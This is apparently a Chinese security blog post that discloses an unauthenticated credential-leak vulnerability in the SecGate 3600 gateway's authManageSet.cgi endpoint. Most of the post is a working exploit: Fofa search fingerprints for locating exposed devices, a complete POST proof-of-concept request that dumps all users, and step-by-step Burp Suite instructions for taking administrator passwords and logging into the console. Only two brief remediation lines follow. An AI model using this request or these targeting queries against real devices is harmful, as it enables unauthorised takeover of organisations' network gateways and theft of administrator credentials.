微信公众号:不秃头的安全
漏洞详情:
SecGate3600是网神信息技术(北京)股份有限公司旗下一款安全网关产品,由于网神SecGate 3600 authManageSet.cgi接口存在敏感信息泄露漏洞,未授权得攻击者可以通过此漏洞获取控制台管理员用户名密码等敏感信息,可登录控制整个后台。
影响范围
SecGate3600-A1500 v3.6.6.0(v2.64.02)
Fofa
body=“sec_gate_image/login_02.gif”
fid=“ldb0WVBlAgZloMw9AAge0A==”
漏洞利用
poc
POST /cgi-bin/authUser/authManageSet.cgi HTTP#/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: /
Accept-Encoding: gzip, deflate
Connection: close
type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc
使用方法:
1、使用浏览器访问目标系统,并使用BurpSuite进行拦截抓包;
2、将BurpSuite拦截的GET请求包转换成POST包,并添加
/cgi-bin/authUser/authManageSet.cgi
接口地址,请求内容为:
type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc
其他内容不修改(https://img-blog.csdnimg.cn/0ea7f79a26544b14abe026084965f233.png)
3、当请求结果状态码返回为200后,就能从返回结果获取到登录账号密码信息,并且使用获取的账号密码可登录后台。
漏洞修复建议
目前厂商已发布安全版本,请联系厂商进行漏洞修复或通过以下方法进行防范漏洞:
1 将authManageSet.cgi接口特征添加WAF规则,进行网络攻击行为拦截;
2 取消互联网映射或设置指定IP访问。